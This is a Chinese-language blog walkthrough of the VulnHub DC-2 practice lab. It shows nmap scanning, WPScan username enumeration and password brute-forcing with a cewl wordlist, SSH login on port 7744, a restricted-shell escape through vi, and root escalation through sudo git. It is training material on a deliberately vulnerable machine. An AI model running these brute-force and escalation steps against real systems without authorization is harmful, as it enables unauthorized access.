0%

vulnhub-DC-2

接着打靶场熟悉工具和渗透思路

主机发现

nmap先上来扫一扫内网网段

nmap -A 192.168.100.0/24

这个104就是dc-2靶机

服务发现

没看出来这个7744是个啥服务

查了一下

好像就是一个用来监控协议传输单元质量的?

不管它,先访问一下这个80

在主机探测的时候,看到了重定向,会定向到dc2这个域名

那就改一下本机hosts

/etc/hosts

1
192.168.100.104 dc-2

访问一下,打开网页,看到了一个flag的tab

说是要爆破,尝试密码,可能有多个帐号爆出来,有的帐号还没有下一个flag

爆破入后台

然后这里我懵了,看了其他师傅的博客才知道有个工具叫cewl

1
2
3
4
5
6
7
8
#安装cewl
#他是用来根据网站的信息生成字典的
sudo apt install cewl
#安装wpscan和依赖
#专门打wordpress的软件
sudo apt install curl git libcurl4-openssl-dev make zlib1g-dev gawk g++ gcc libreadline6-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3 autoconf libgdbm-dev libncurses5-dev automake libtool bison pkg-config ruby ruby-bundler ruby-dev

sudo gem install wpscan

题外话,这个时候就是kali方便了..工具自带

这是什么玄学问题???

还有我的cewl生成的字典也是空的…可能是环境的玄学问题..

?不知道咋回事

记录一下WPScan的使用参数

1
2
3
4
5
–url 扫描网站
-e 枚举
u 枚举用户名,默认从1-10
p 枚举插件
t 枚举主题信息

枚举用户名

wpscan --url http://dc-2 --enumerate u

爆破密码(将cewl爆出来的dict.txt密码和上一个枚举的用户名放入user.txt中)

wpscan --url http://dc-2/ -U users.txt -P dict.txt

我这里是没成功爆出来,因为wpscan扫不出来

cewl也是

jerry adipiscing提示了找别的入口

tom parturient使用7744登录ssh

拿到shell

cat,more不能用,

用vi在家目录下找到了这个flag3.txt

可怜的汤姆一直落后与杰瑞可能需要su来解决这个问题

汤姆杰瑞…我才发现这是猫和老鼠(不是

vi提权(切用户)

vi进入vi编辑界面你

:set shell=/bin/sh

:shell

进入shell之后修改环境变量输出

export PATH="/usr/sbin:/usr/bin:/rbin:/bin"

然后切换用户jerry

su jerry输入刚才jerry的密码

find / -name flag4.txt找到flag位置

git提权(root)

提示git提权

输入sudo git help config

在打开的手册界面!/bin/bash

前提是执行sudo -l 提示不需要密码可以使用git命令

找找最后的flag

find / -name *flag*

参考

https://lnng.top/posts/2ea3.html#toc-heading-16